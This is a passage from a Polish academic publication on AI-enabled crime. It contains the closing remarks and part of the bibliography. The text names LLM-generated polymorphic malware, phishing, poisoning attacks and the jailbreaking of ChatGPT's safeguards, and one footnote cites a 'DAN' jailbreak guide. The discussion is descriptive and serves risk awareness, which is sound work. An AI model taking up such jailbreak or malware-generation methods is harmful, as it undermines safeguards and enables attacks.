zdolności systemów do tworzenia interakcji między algorytmami. Możliwości jej
wykorzystania wydają się nieograniczone. Z całą pewnością może być wykorzystywana
do zarządzanie infrastrukturą i usługami użyteczności publicznej, tworzenia wielu
programów badawczo-rozwojowych (R&D) w dziedzinie zdrowia, planowaniu,
monitorowaniu zapasów i zarządzaniu przepływami w sektorze handlu detalicznego oraz
e-commerce, Trudno też nie docenić robotyki z wbudowaną AI w przemyśle. Uczniowie
i studenci już dostrzegli możliwości dużych modeli językowych (LLM)
110
– prace
pisemne na dowolny temat przestały być dla nich problemem. A dla cyberprzestępców
LLM to idealne narzędzie do tworzenia złośliwego kodu polimorficznego
111
, inżynierii
społecznej (tworzenie dopasowanych do profilu ofiary treści do phishingu, kreowanie
108
Caldwell M., Andrews J.T.A., Tanay T., Griffin L.D., AI-enabled …, op. cit.
109
Deepfakes’ ranked as most serious AI crime threat, Wiadomości UCL, 4 sierpnia 2020,
https://www.ucl.ac.uk/news/2020/aug/deepfakes-ranked-most-serious-ai-crime-threat
110
Duży model językowy (LLM) to model uczenia maszynowego, który został przeszkolony na ogromnym
zestawie danych w celu wykonywania zadań związanych ze zrozumieniem i generowaniem języka
naturalnego. Inaczej to definiując jest to sieć neuronowa z miliardami parametrów trenowana na ogromnych
ilościach nieoznakowanego tekstu przy użyciu uczenia samonadzorowanego lub częściowo nadzorowanego .
LLM wykorzystuje również technologię semantyczną i procesy języka naturalnego. Modele te mogą rozumieć
i generować tekst podobny do ludzkiego, co czyni je niezwykle wszechstronnymi i wykonywanie szerokiej
gamy zadań, od analizy nastrojów po rozumowanie matematyczne.
111
Kod polimorficzny to taki, który zmienia się w czasie, nie modyfikując oryginalnego algorytmu, który
zawiera. Przeważnie jest używany przez różnego rodzaju wirusy i robaki komputerowe. Kod polimorficzny
utrudnia zadanie programom antywirusowym, ponieważ wprowadza modyfikacje w kodzie przy każdej nowej
kopii wirusa. To sprawia, że jest bardziej zmienny i trudniejszy do wykrycia. Szerzej - The world’s most
widely adopted AI developer tool, https://github.com/features/copilot ; Sims J., BlackMamba: Using AI to
Generate Polymorphic Malware, HYAS, 31 lipca 2023, https://www.hyas.com/blog/blackmamba-using-ai-to-
generate-polymorphic-malware
289
fikcyjnych postaci/legend itp.) lub rozpoznania z ogólnodostępnych źródeł (OSINT) dla
celów przestępczych
112
. Każdy przekaz cyfrowy (głos, obraz, tekst, video) może być
sztucznie generowany i podlegać manipulacji.
Wykorzystując AI można opierać się o specjalnie przygotowane do określonego
celu komercyjne programy, ale też można stworzyć własną aplikację AI. Istnieją różne
narzędzia i platformy, które umożliwiają tworzenie aplikacji z wykorzystaniem sztucznej
inteligencji. Na przykład, można użyć Google Sheets i Forms, aby stworzyć aplikację z
wykorzystaniem AI za darmo. Można również skorzystać z usług takich jak Appy Pie,
aby zbudować własną aplikację z arkuszami Google w prostych krokach, można również
skorzystać z różnych bibliotek i narzędzi do tworzenia modeli sztucznej inteligencji,
takich jak TensorFlow czy Keras. Większość algorytmów to oprogramowanie, dla którego
oryginalny kod źródłowy jest udostępniany bezpłatnie i może być rozpowszechniany
(open source). Ogólnie rzecz biorąc, tworzenie własnej aplikacji AI jest możliwe i
dostępne dla każdego, kto ma odpowiednią wiedzę i umiejętności. Jedynym
ograniczeniem technologicznym może być dostępność odpowiednich danych i zasobów
obliczeniowych. Sztuczna inteligencja opiera się na analizie dużych ilości danych,
dlatego aby skutecznie wykorzystać jej potencjał, konieczne jest posiadanie odpowiedniej
ilości i jakości danych. Ponadto, przetwarzanie tych danych wymaga dużej mocy
obliczeniowej, co może stanowić ograniczenie – w dobie powstawania firm komercyjnie
je udostępniających - bardziej ekonomiczne niż techniczne. Ale ile osób zdaje sobie
sprawę, że wykorzystanie niesprawdzonych bibliotek i narzędzi może skutkować
pozyskaniem narzędzia lub biblioteki celowo przygotowanej przykładowo na atak
zatrucia (ang. poisoning-attack).
Musimy pamiętać, że „Jailbreaking”
113
, powstały w 2007 r. w celu obejścia
ograniczeń narzuconych przez Apple na urządzenia działające pod tym systemem,
świętuje drugą młodość w celu obejścia zabezpieczeń ChatGPT narzuconych przez
OpenAI
114
.
Trzeba też zdawać sobie sprawę z tego, że AI karmiona niewłaściwymi danymi może
dawać nieprawidłowe wyniki, czasami wręcz niebezpiecznymi dla człowieka.
Przykładowo medyczne chatboty nie mają możliwości diagnostycznych lekarza-
człowieka i mogą nie wychwycić subtelnych niuansów objawów pacjenta, tak jak
zrobiłby to lekarz-człowiek, skutkujących w efekcie postawieniem błędnej diagnozy.
AI jest maszynę, czyli sztucznym, złożony cybernetycznym systemem komputer-
oprogramowanie-osprzęt (systemem informatycznym z logiką operacyjną oraz aparatem
wykonawczym, które łączą spójne relacje) podatnym na szereg możliwych ataków, które
mogą także spowodować błędne wyniki lub zakłócić jego pracę, Łatwo sobie wyobrazić
112
Security Implications of ChatGPT, 08.02.2023, https://cloudsecurityalliance.org/artifacts/security-
implications-of-chatgpt ; Gupta M., Akiri C., Aryal K., Parker E., Praharaj L., From ChatGPT to ThreatGPT:
Impact of Generative AI in Cybersecurity and Privacy, in IEEE Access, vol. 11, pp. 80218-80245, 2023, doi:
10.1109/ACCESS.2023.3300381 ;
113
Jailbreaking to termin pochodzący z języka angielskiego, który oznacza oprogramowanie umożliwiające
obejście zabezpieczeń. W Polsce termin ten jest często tłumaczony jako "odblokowanie" lub "łamanie
blokady".
114
How to Use ChatGPT Dan – Detailed Guide, GilPress, October 28th 2023,
https://whatsthebigdata.com/chatgpt-dan/ ; Wan A., Wallace E., Shen S., Klein D., Poisoning language models
during instruction tuning. In Proceedings of the 40th International Conference on Machine Learning
(ICML'23), 1 May 2023, https://doi.org/10.48550/arXiv.2305.00944
290
atak na taki system w celu wyłudzenia okupu, tak jak ataki ransomware na klasyczne
systemy informatyczne.
Stąd też odpowiednie umiejętności i wiedza są kluczowe dla skutecznego
tworzenia i wykorzystywania sztucznej inteligencji. Trzeba sobie zdawać sprawę z
zagrożeń, odpowiednio im zapobiegać i wiedzieć jak postąpić w sytuacji kryzysowej. Nie
ma obecnie wiarygodnych narzędzi do weryfikowania treści generowanych przez AI. A
brak regulacji prawnych w zakresie AI nie zapewnia bezpieczeństwa i ochrony prawnej
dla twórców i użytkowników tej technologii. Prawnym dylematem jest bowiem jak dotąd
kwestia chociażby tego kto ponosi odpowiedzialność za ewentualne błędy AI –
programista tworzący jej kod źródłowy z błędem czy użytkownik pozwalający pracować
aplikacji bez nadzoru. Świat zachwycił się możliwościami jakie daje sztuczna inteligencja,
nie zawsze właściwie analizując ryzyko jej zastosowania I poznaniu przynajmniej części
tych zagrożeń służy ta publikacja.
17.02.2024
BIBLIOGRAFIA
1. 2022 Imperva Bad Bot Report. Evasive Bots Drive Online Fraud, Imperva,
https://www.imperva.com/resources/resource-library/reports/bad-bot-report/
2. Abedi M., Alexa and Siri can hear hidden commands that you can’t,
researchers warn, Global News, 11 maja 2018,
https://globalnews.ca/news/4202640/alexa-siri-hidden-commands-research/
3. Ajder H., Patrini G, Cavalli F., Cullen L., The State of Deepfakes 2019
Landscape, Threats, and Impact, September 2019, Deeptrace,
https://share.hsforms.com/1cg_h2aPnRrufZeN8HDjWPw3hq83
4. Akhtar N., Mian A., Threat of Adversarial Attacks on Deep Learning in
Computer Vision: A Survey, ver. 3, 26 lutego 2018,
https://doi.org/10.48550/arXiv.1801.00553
5. Akt ws. sztucznej inteligencji: pierwsze przepisy regulujące sztuczną
inteligencję,, Parlament Europejski, Aktualności - Społeczeństwo, 13-06-2023,
https://www.europarl.europa.eu/news/pl/headlines/society/20230601STO93804
/akt-ws-sztucznej-inteligencji-pierwsze-przepisy-regulujace-ai
6. Amodei D., Olah C., Steinhardt J., Christiano P., Schulman J., Mané D.,
Concrete Problems in AI Safety, 25 lipca 2016,
https://doi.org/10.48550/arXiv.1606.0656 5
7. Athalye A., Engstrom L., Ilyas A., Kwok K., Synthesizing Robust Adversarial
Examples, 7 czerwca 2018, https://doi.org/10.48550/arXiv.1707.07397
8. Behind the Scenes: Dalí Lives, The Dalí Museum,
https://youtu.be/BIDaxl4xqJ4
9. Berdzik T., Bezzałogowe urządzenia pływające i latające jako narzędzie
realizacji ataków terrorystycznych – współczesna problematyka, [w:]
Dajnowicz-Piesiecka D., Jurgielewicz-Delegacz E., Pływaczewski E.W. (red.),
Prawo karne i kryminologia wobec kryzysów XXI w., Wolters Kluwer Polska
2022807-823
291
10. Bishop Fox, DEF CON 25 (2017) - Weaponizing Machine Learning - Petro,
Morris - Stream – 30 July 2017, https://archive.org/details/youtube-
wbRx18VZlYA
11. Blakkarly J., A gay sex tape is threatening to end the political careers of two
men in Malaysia, SBS News, 17 czerwca 2019,
https://www.sbs.com.au/news/article/a-gay-sex-tape-is-threatening-to-end-the-
political-careers-of-two-men-in-malaysia/ilgqdaqo5
12. Blauth T.F., Gstrein O.J., Zwitter A., Artificial Intelligence Crime: An
Overview of Malicious Use and Abuse of AI, IEEE Access 2022, vol.
1077110-77122, https://doi.org/10.1109/ACCESS.2022.3191790
13. Boden M.A., Sztuczna inteligencja, Wyd. Uniwersytetu Łódzkiego 2020
14. Bonaccorso G., Algorytmy uczenia maszynowego. Zaawansowane techniki
implementacji, Helion Gliwice 2019
15. Bostrom, N., Superinteligencja. Scenariusze, strategie, zagrożenia,
Wydawnictwo Helion Gliwice 2021
16. Brownlee J., A Tour of Machine Learning Algorithms, August 12, 2019,
https://machinelearningmastery.com/a-tour-of-machine-learning-algorithms/
17. Brownlee J., Master Machine Learning Algorithms (e-book), 2021,
18. Brundage M. i in., The Malicious Use of Artificial Intelligence: Forecasting,
Prevention, and Mitigation, Future of Humanity Institute Oxford U.K.,
February 2018
19. Brundage M., Avin S., Clark J., Toner H., Eckersley P., Garfnkel B., Dafoe A.,
Scharre P., Zeitzof T., Filar B., Anderson H., Rof H., Allen G. C., Steinhardt J.,
Flynn C.,Ó Heighartaigh S., Beard S., Belfeld H., Farquhar S., Lyle C., Crootof
R., Evans O., Page M., Bryson J., Yampolskiy, R., Amodei D., The Malicious
Use of Artificial Intelligence: Forecasting, Prevention, and Mitigation, Future
of Humanity Institute Oxford U.K., February 2018,
https://arxiv.org/ftp/arxiv/papers/1802/1802.07228.pdf
20. Burke J., Securing AI during the development process, TechTarget, 25 stycznia
2022, https://www.techtarget.com/searchenterpriseai/tip/Securing-AI-during-
the-development-process
21. Caldwell M., Andrews J.T.A., Tanay T., Griffin L.D., AI-enabled future crime.
Crime Science 2020, Vol. 9, nr 14, https://doi.org/10.1186/s40163-020-00123-8
22. Cavas C.P., New Houthi weapon emerges: a drone boat, Defense News, 19
lutego 2017, https://www.defensenews.com/digital-show-
dailies/idex/2017/02/19/new-houthi-weapon-emerges-a-drone-boat/
23. Ciancaglini V. Gibson C., Sancho D., Malicious uses and abuses of artificial
intelligence, Trend Micro Research; United Nations Interregional Crime and
Justice Research Institute (UNICRI); Europol’s European Cybercrime Centre
(EC3), 6 grudnia 2021,
https://www.europol.europa.eu/cms/sites/default/files/documents/malicious_us
es_and_abuses_of_artificial_intelligence_europol.pdf
24. Ciechanowska J., Reklama polityczna. Jej geneza, definicja i funkcje, Zeszyty
Naukowe Uniwersytetu Rzeszowskiego 2011. Seria Prawnicza Prawo 10,
Zeszyt 71/201139-49
25. Ciemski W., Nowy Botnet RapperBot, Security Bez Tabu, 10 sierpnia 2022,
https://securitybeztabu.pl/nowy-botnet-rapperbot/
292
26. Czym jest machine learning?, Trend Micro,
https://www.trendmicro.com/pl_pl/what-is/machine-learning.html
27. Deepfakes’ ranked as most serious AI crime threat, Wiadomości UCL, 4
sierpnia 2020, https://www.ucl.ac.uk/news/2020/aug/deepfakes-ranked-most-
serious-ai-crime-threat
28. Domagała M., Zagrożenia związane z wprowadzeniem pojazdów
autonomicznych jako przykład negatywnych skutków rozwoju sztucznej
inteligencji,[w:] Lai L., Świerczyński M. (red.), Prawo sztucznej inteligencji,
CHBeck 2020239-248
29. Eadicicco L, Niebezpieczny internetowy trend może przyczynić się do
zniszczenia twojej reputacji. Nikt nie wie, co z nim zrobić, Business Insider, 14
lipca 2019 https://businessinsider.com.pl/technologie/nowe-
technologie/deepfakes-historia-falszywych-filmow-i-pomysly-na-walke-z-
nimi/s17z2p0
30. Elsom J., Moment an Amazon Alexa tells a terrified mother, 29, to 'stab
yourself in the heart for the greater good' while reading from rogue Wikipedia
text, MailOnline News, 19 grudnia 2019,
https://www.dailymail.co.uk/news/article-7809269/Amazon-Alexa-told-
terrified-mother-29-stab-heart-greater-good.html
31. Gao Y., Singh R. Raj B., Voice impersonation using Generative Adversarial
Networks, 19 lutego 2018, https://arxiv.org/pdf/1802.06840
32. Ghorbanzadeh O., Blaschke T., Gholamnia K., Meena S. R., Tiede D, Aryal J.,
Evaluation of Different Machine Learning Methods and Deep-Learning
Convolutional Neural Networks for Landslide Detection, Remote Sens 2019,
nr 11(2)196, https://doi.org/10.3390/rs11020196
33. Giansiracusa N., Deepfake Deception. In: How Algorithms Create and Prevent
Fake News, Apress, Berkeley, CA 2021. https://doi.org/10.1007/978-1-4842-
7155-1_3 ;
34. Gibbons-Neff T., ISIS used an armed drone to kill two Kurdish fighters and
wound French troops, report says, The Washington Post, 11 października 2016,
https://www.washingtonpost.com/news/checkpoint/wp/2016/10/11/isis-used-
an-armed-drone-to-kill-two-kurdish-fighters-and-wound-french-troops-report-
says/
35. Goldstein J. A., Sastry G., Musser M., DiResta R., Gentzel M., Sedova K.,
Generative language models and automated influence operations: Emerging
threats and potential mitigations, 10 stycznia 2023,
https://doi.org/10.48550/arXiv.2301.04246
36. Goodfellow I., Pouget-Abadie J., Mirza M., Xu B., Warde-Farley D., Ozair S.,
Courville A., Bengio Y.,. Generative Adversarial Networks, Advances in
Neural Information Processing Systems 2014, nr 3(11), DOI:10.1145/3422622,
https://www.researchgate.net/profile/Y-
Bengio/publication/263012109_Generative_Adversarial_Networks/links/546b
70220cf20dedafd5303b/Generative-Adversarial-Networks.pdf lub
https://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf
37. Goodfellow Y., Bengio Y., Courville A., Deep Learning, The MIT Press
London 2016; Tabor J., Śmieja M., Struski Ł., Spurek P., Wołczyk M.,
Głębokie uczenie. Wprowadzenie, Wyd. Helion Gliwice 2022
293
38. Gu T., Liu K., Dolan-Gavitt B., Garg S., BadNets: evaluating backdooring
attacks on deep neural networks, IEEE Access 2019, vol. 747230-47244,
https://ieeexplore.ieee.org/document/8685687
39. Gupta M., Akiri C., Aryal K., Parker E., Praharaj L., From ChatGPT to
ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy, in IEEE
Access, vol. 11, pp. 80218-80245, 2023, doi: 10.1109/ACCESS.2023.3300381
40. Harari Y.N., Homo deus. Krótka historia jutra, Wydawnictwo Literackie
Kraków 201842
41. Harwell D., An artificial-intelligence first: Voice-mimicking software
reportedly used in a major theft, The Washington Post, 4 września 2019,
https://www.washingtonpost.com/technology/2019/09/04/an-artificial-
intelligence-first-voice-mimicking-software-reportedly-used-major-theft/
42. Hearing A., Capitol Records forced to drop its artificial-intelligence-created
rapper after just one week following ‘gross stereotypes’ backlash, Fortune, 24
sierpnia 2022, https://fortune.com/2022/08/24/fn-meka-artificial-intelligence-
rapper-dropped-by-capitol-records-gross-stereotypes-backlash/
43. Heineman G., Nauka algorytmów. Poradnik pisania lepszego kodu, Helion
Gliwice 2022
44. Hibbard B., Ethical Artificial Intelligence, 2015,
https://arxiv.org/pdf/1411.1373 ; Johnson D. G., Verdicchio M., Reframing AI
discourse, Minds Mach 2017, vol. 27, nr 4575–590,
https://doi.org/10.1007/s11023-017-9417-6
45. Hilt S., The Sound of a Targeted Attack, The Global Technical Support and
R&D Center of Trend Micro 2017,
https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-
Attack.pdf
46. Hitaj B., Gasti P., Ateniese G., Perez-Cruz F., PassGAN: A Deep Learning
Approach for Password Guessing, 14 lutego 2019,
https://arxiv.org/pdf/1709.00440.pdf
47. How to Use ChatGPT Dan – Detailed Guide, GilPress, October 28th 2023,
https://whatsthebigdata.com/chatgpt-dan/
48. Holger C., A list of papers on Generative Adversarial (Neural) Networks:
nightrome/really-awesome-gan, State on 1 Nov 2021,
https://github.com/nightrome/really-awesome-gan
49. Jakubski K.J., Analiza działań rządowych w zakresie cyberbezpieczeństwa za
okres trwania TAPT, [w:] Przestępczość teleinformatyczna 2017 (red.) J.
Kosiński, Wyd. WSPol. Szczytno 2018. s. 13-41
50. Joplin T., A Military Coup in Gabon Inspired by a Potential Deepfake Video Is
Our Political Future, Albawaba News, 8 maja 2019,
https://www.albawaba.com/news/military-coup-gabon-inspired-potential-
deepfake-video-our-political-future-1284760
51. Kaplan J., Humans Need Not Apply: A Guide to Wealth and Work in the Age
of Artificial Intelligence, Yale University Press 201519; Kaplan J., Sztuczna
inteligencja. Co każdy powinien wiedzieć, PWN 202229-33
52. Kaplan J., Sztuczna inteligencja. Co każdy powinien wiedzieć, PWN 202230
53. Kędzierska W., Lud Rohingya, Kompas Kryzysowy, 24 marca 2021,
https://kompaskryzysowy.pl/lud-rohingya
294
54. King T.C., Aggarwal N., Taddeo M., Floridi L., Artificial Intelligence Crime:
An Interdisciplinary Analysis of Foreseeable Threats and Solutions, Science
and Engineering Ethics 2020, nr 2689-120, https://doi.org/10.1007/s11948-
018-00081-0
55. Kirat D., Jang J., Stoecklin M.P., DeepLocker. Concealing Targeted Attacks
with AI Locksmithing, Black Hat USA 2018, 9 sierpnia 2018,
https://i.blackhat.com/us-18/Thu-August-9/us-18-Kirat-DeepLocker-
Concealing-Targeted-Attacks-with-AI-Locksmithing.pdf
56. Komisja Europejska „Biała księga w sprawie sztucznej inteligencji.
Europejskie podejście do doskonałości i zaufania”, COM(2020) 65 final, 2020
r. https://ec.europa.eu/info/sites/default/files/commission-white-paper-artificial-
intelligence-feb2020_pl.pdf .
57. Komisja Europejska, A European approach to artificial intelligence, Shaping
Europe’s digital future, https://digital-
strategy.ec.europa.eu/pl/policies/european-approach-artificial-intelligence
58. Komisja Europejska ,Artificial Intelligence Act: deal on comprehensive rules
for trustworthy AI, https://www.europarl.europa.eu/news/pl/press-
room/20231206IPR15699/artificial-intelligence-act-deal-on-comprehensive-
rules-for-trustworthy-ai
59. Kosiński J., Artificial intelligence and cybersecurity, Cybersecurity and
Cybercrime 2023, Nr 1(2), s. 20-37, https://doi.org/10.5604/01.3001.0053.8018
60. Krakovna V., Specification gaming examples in AI, blog, 2 kwietnia 2018,
https://vkrakovna.wordpress.com/2018/04/02/specification-gaming-examples-
in-ai/
61. Krohn J., Beyleveld G., Bassens A., Głębokie uczenie i sztuczna inteligencja.
Interaktywny przewodnik ilustrowany, Helion Gliwice 202221-37
62. Kumar R.S.S., O’Brien D., Snover J., Albert K., Viljoen S., Tryby awarii w
uczeniu maszynowym, Microsoft Ignite, 2 wczerwca 2023,
https://learn.microsoft.com/pl-pl/security/engineering/failure-modes-in-
machine-learning
63. Lapan M. Głębokie uczenie przez wzmacnianie. Praca z chatbotami oraz
robotyka, optymalizacja dyskretna i automatyzacja sieciowa w praktyce.
Wydanie II, Helion Gliwice 2022572-573
64. Lee P., Learning from Tay’s introduction, Official Microsoft Blog, 25 marca
2016, https://blogs.microsoft.com/blog/2016/03/25/learning-tays-introduction/
65. Li G., Zhu P., Li J., Yang Z., Cao N., Chen Z., Security Matters: A Survey on
Adversarial Machine Learning, 23 października 2018,
https://doi.org/10.48550/arXiv.1810.07339 ; Chakraborty A., Alam M., Dey V.,
Chattopadhyay A., Mukhopadhyay D., Adversarial Attacks and Defences: A
Survey, 28 września 2018, https://doi.org/10.48550/arXiv.1810.00069 ;
66. Li H., Yufei Wang Y., Xie X., Liu Y., Wang S., Wan R., Chau L-P., Kot A.C.,
Light Can Hack Your Face! Black-box Backdoor Attack on Face Recognition
Systems, 15 września 2020, https://doi.org/10.48550/arXiv.2009.06996
67. Liderman K., Bezpieczeństwo informacyjne, PWN, Warszawa 2012, Białas A.,
Bezpieczeństwo informacji i usług w nowoczesnej instytucji i firmie, PWN
Warszawa 2017
295
68. Lovisotto G., Eberz S., Martinovic I., Biometric Backdoors: A Poisoning
Attack Against Unsupervised Template Updating, 2020 IEEE European
Symposium on Security and Privacy (EuroS&P), 22 maja 2019,
DOI:10.1109/EuroSP48549.2020.00020, https://arxiv.org/pdf/1905.09162.pdf
69. Łukaszewicz A., Astroturfing - czym jest i czy należy za niego karać,
Rzeczpospolita, 28 marca 2018, https://www.rp.pl/prawo-karne/art2039691-
astroturfing-czym-jest-i-czy-nalezy-za-niego-karac
70. McCarthy J., Minsky M., Rochester N., Shannon C., A Proposal for the
Dartmouth Summer Research Project on Artificial Intelligence, August 31
1955, AI Magazine 2006, Vol. 27(4), https://doi.org/10.1609/aimag.v27i4.1904
71. McDaniel P., Papernot N., Celik Z.B., Machine Learning in Adversarial
Settings, IEEE Security & Privacy 2016,
https://beerkay.github.io/papers/Berkay2016adversarialSPMagazine.pdf
72. Nichols S., Stale sessions, ML poisoning among 2021's top security threats,
TechTarget, 21 maja 2021,
https://www.techtarget.com/searchsecurity/news/252501236/Stale-sessions-
ML-poisoning-among-2021s-top-security-threats
73. Oprea A., Vassilev A., Adversarial Machine Learning. A Taxonomy and
Terminology of Attacks and Mitigations, NIST AI 100-2e2023. ipd, s.4,
https://doi.org/10.6028/NIST.AI.100-2e2023.ipd
74. Palka S., McCoy D., Fuzzin E-mail Filters with Generative Grammars and N-
Gram Analysis
https://www.usenix.org/system/files/conference/woot15/woot15-paper-
palka.pdf
75. Parker R.,‘South Park’ Episode Triggers Viewers’ Amazon Alexa and Google
Home, The Hollywood Reporter, 14 września 2017,
https://www.hollywoodreporter.com/tv/tv-news/south-park-premiere-messes-
viewers-amazon-alexa-google-home-1039035/
76. Parlament Europejski, Big data: definicja, korzyści, wyzwania (infografika),
Aktualności – Społeczeństwo, ostatnia aktualizacja: 17-03-2023,
https://www.europarl.europa.eu/news/pl/headlines/society/20210211STO97614
/big-data-definicja-korzysci-wyzwania-infografika
77. Parlament Europejski, Akt ws. Sztucznej inteligencji: pierwsze przepisy
regulujące sztuczną inteligencję, ostatnia aktualizacja: 19-12-2023,
https://www.europarl.europa.eu/topics/pl/article/20230601STO93804/akt-ws-
sztucznej-inteligencji-pierwsze-przepisy-regulujace-ai
78. Pasztelański P., Hiszpanie przejęli podwodne drony do przemytu narkotyków,
TVP Info, 5 lipca 2022, https://www.tvp.info/61112795/hiszpania-policja-
przejela-podwodne-drony-do-przemytu-narkotykow
79. Patterson J., Gibson A., Deep Learning. Praktyczne wprowadzenie, Helion
Gliwice 2018
80. Projekt sprawozdania Parlamentu Europejskiego na temat sztucznej inteligencji
w prawie karnym i jej stosowania przez policję i organy wymiaru
sprawiedliwości w sprawach karnych,
https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?lang=en&
reference=2020/2016(INI)
296
81. Projekt sprawozdania Parlamentu Europejskiego w sprawie sztucznej
inteligencji w sektorze edukacji i kultury oraz w sektorze audiowizualnym,
https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?reference
=2020/2017(INI)&l=en.
82. Przegląd Rady Europy: Działania związane ze sztuczną inteligencją, marzec
2023, https://rm.coe.int/brochure-artificial-intelligence-en-march-2023-
print/1680aab8e6
83. Rada Europejska, Nadzwyczajne posiedzenie Rady Europejskiej (1 i 2
października 2020 r.) – Konkluzje, EUCO 13/20, 2020 r.,
https://www.consilium.europa.eu/media/45927/021020-euco-final-conclusions-
pl.pdf
84. Rada Europejska, Posiedzenie Rady Europejskiej (19 października 2017 r.) –
Konkluzje EUCO 14/17, 2017,
https://www.consilium.europa.eu/media/21610/19-euco-final-conclusions-
pl.pdf
85. Rada Unii Europejskiej, Sztuczna inteligencja b) Konkluzje na temat
skoordynowanego planu w sprawie sztucznej inteligencji – Przyjęcie 6177/19,
2019, https://data.consilium.europa.eu/doc/document/ST-6177-2019-
INIT/pl/pdf
86. Redzisz M., Michał Kosiński: Wojnę o prywatność już przegraliśmy,
sztucznainteligencja.org.pl, 31 stycznia 2020,
https://www.sztucznainteligencja.org.pl/michal-kosinski-wojne-o-prywatnosc-
juz-przegralismy/
87. Rego A., Ramírez P.L.G., Jimenez J.M., Lloret J., Artificial intelligent system
for multimedia services in smart home environments. Cluster Computing 2022,
nr 25, s, 2085–2105, https://doi.org/10.1007/s10586-021-03350-z
88. Regulacje ws. sztucznej inteligencji: oczekiwania Parlamentu, Parlament
Europejski, Aktualności – Priorytety, ostatnia aktualizacja: 20-06-2023,
https://www.europarl.europa.eu/news/pl/headlines/priorities/sztuczna-
inteligencja-w-ue/20201015STO89417/regulacje-ws-sztucznej-inteligencji-
oczekiwania-parlamentu.
89. Rezolucja Parlamentu Europejskiego z dnia 20 października 2020 r. w sprawie
praw własności intelektualnej w dziedzinie rozwoju technologii sztucznej
inteligencji, https://www.europarl.europa.eu/doceo/document/A-9-2020-
0176_PL.html
90. Rezolucja Parlamentu Europejskiego z dnia 20 października 2020 r. w sprawie
ram aspektów etycznych sztucznej inteligencji, robotyki i powiązanych z nimi
technologii.
https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?lang=en&
reference=2020/2012(INL)
91. Rezolucja Parlamentu Europejskiego z dnia 20 października 2020 r. w sprawie
systemu odpowiedzialności cywilnej za sztuczną inteligencję
https://www.europarl.europa.eu/doceo/document/TA-9-2020-0276_PL.html
92. Ribeiro M.T., Singh S., Guestrin C., “Why Should I Trust You?” Explaining
the Predictions of Any Classifier, 9 sierpnia 2016,
https://doi.org/10.48550/arXiv.1602.04938
297
93. Romera R., Home Automation and Cybercrime, Trend Micro Inc. 2013,
https://docslib.org/doc/3460117/home-automation-and-cybercrime
94. Russell S., Norvig P., Artificial Intelligence: A Modern Approach, Global
Edition, Pearson Education Limited 202117-26; polskie wydanie: Russell S.,
Norvig P., Sztuczna inteligencja. Nowe spojrzenie Wydanie IV, Tom 1, Helion
202335-45
95. Russell S., Norvig P., Sztuczna inteligencja. Nowe spojrzenie Wydanie IV. Tom
1, Helion 202336-39
96. Schjolberg S., The History of Cybercrime Third edition, Books on Demand
(BoD), 2020,
97. Security Implications of ChatGPT, CSA, 08.02.2023,
https://cloudsecurityalliance.org/artifacts/security-implications-of-chatgpt
98. Shackleford D., How hackers use AI and machine learning to target enterprises,
TechTarget, https://www.techtarget.com/searchsecurity/tip/How-hackers-use-
AI-and-machine-learning-to-target-enterprises
99. Sims J., BlackMamba: Using AI to Generate Polymorphic Malware, HYAS, 31
lipca 2023, https://www.hyas.com/blog/blackmamba-using-ai-to-generate-
polymorphic-malware
100. Singh A., Thaware V., Wire Me Through Machine Learning, Black Hat USA
2017, https://www.blackhat.com/us-17/briefings/schedule/#wire-me-through-
machine-learning-6749
101. Snow J., Amazon’s Face Recognition Falsely Matched 28 Members of
Congress With Mugshots, ACLU, 26 lipca 2018,
https://www.aclu.org/news/privacy-technology/amazons-face-recognition-
falsely-matched-28
102. Son D., Deep Exploit: Fully automatic penetration test tool using Machine
Learning, securityonline, 7 kwietnia 2018, https://securityonline.info/deep-
exploit/
103. Soret B., Nguyen L.M., Seeger J., Bröring A., Issaid Ch.B., Samarakoon S.,
Gabli El A., Kulkarni V., Bennis M., Popovski P., Learning, Computing, and
Trustworthiness in Intelligent IoT Environments: Performance-Energy
Tradeoffs, IEEE Transactions on Green Communications and Networking
2022, vol. 6, no. 1629-644, doi: 10.1109/TGCN.2021.3138792;
104. Stephenson D., Big data, nauka o danych i AI bez tajemnic. Podejmuj lepsze
decyzje i rozwijaj swój biznes!, Helion 2019
105. Sumpter D., Osaczeni przez liczby. O algorytmach, które kontrolują nasze
życie. Od Facebooka i Google'a po fake newsy i bańki filtrujące, Copernicus
Center Press 2019
106. Sumpter D., Osaczeni przez liczby., Copernicus Center Press Kraków 201929
107. Surma J., Hakowanie sztucznej inteligencji, PWN Warszawa 202123-29
108. Szerzej - Harrison G., NoSQL, NewSQL i BigData. Bazy danych następnej
generacji, Helion 2019; Marz N., Warren J., Big Data. Najlepsze praktyki
budowy skalowalnych systemów obsługi danych w czasie rzeczywistym,
Helion 2016;
109. Sztuczna inteligencja a sektor nauki i szkolnictwa wyższego. Przegląd
dokumentów strategicznych i osiągnięć na świecie. Raport opracowany na
zlecenie Ministerstwa Nauki i Szkolnictwa Wyższego, Ośrodek Przetwarzania
298
Informacji – Państwowy Instytut Badawczy, Warszawa 2020,
https://radon.nauka.gov.pl/analizy/strategieSI
110. Sztuczna inteligencja pełna błędów i wpadek. Od takiej z filmów SF dzielą nas
lata świetlne, dziennik.pl, 10 sierpnia 2020,
https://technologia.dziennik.pl/aktualnosci/artykuly/7795378,sztuczna-
inteligencja-si-amazon-problemy-rozpoznawanie-twarzy.html
111. Sztuczna inteligencja: co to jest i jakie ma zastosowania?, Parlament
Europejski, Aktualności – Społeczeństwo, ostatnia aktualizacja: 26-04-2021,
https://www.europarl.europa.eu/news/pl/headlines/society/20200827STO85804
/sztuczna-inteligencja-co-to-jest-i-jakie-ma-zastosowania
112. Tadeusiewicz R., Szaleniec M., Leksykon sieci neuronowych, Wydawnictwo
Fundacji „Projekt Nauka” Wrocław 2015110
113. Tadeusiewicz R., Szaleniec M., Leksykon sieci neuronowych, Wydawnictwo
Fundacji „Projekt Nauka” Wrocław 201594
114. Takanen A., Fuzzing for Software Security Testing and Quality Assurance,
https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.398.6662&rep=rep
1&type=pdf
115. Tomaszkiewicz M., Salvador Dali robi selfie ze zwiedzającymi muzeum,
Antyradio,14 maja 2021, https://www.antyradio.pl/News/Dali-wskrzeszony-
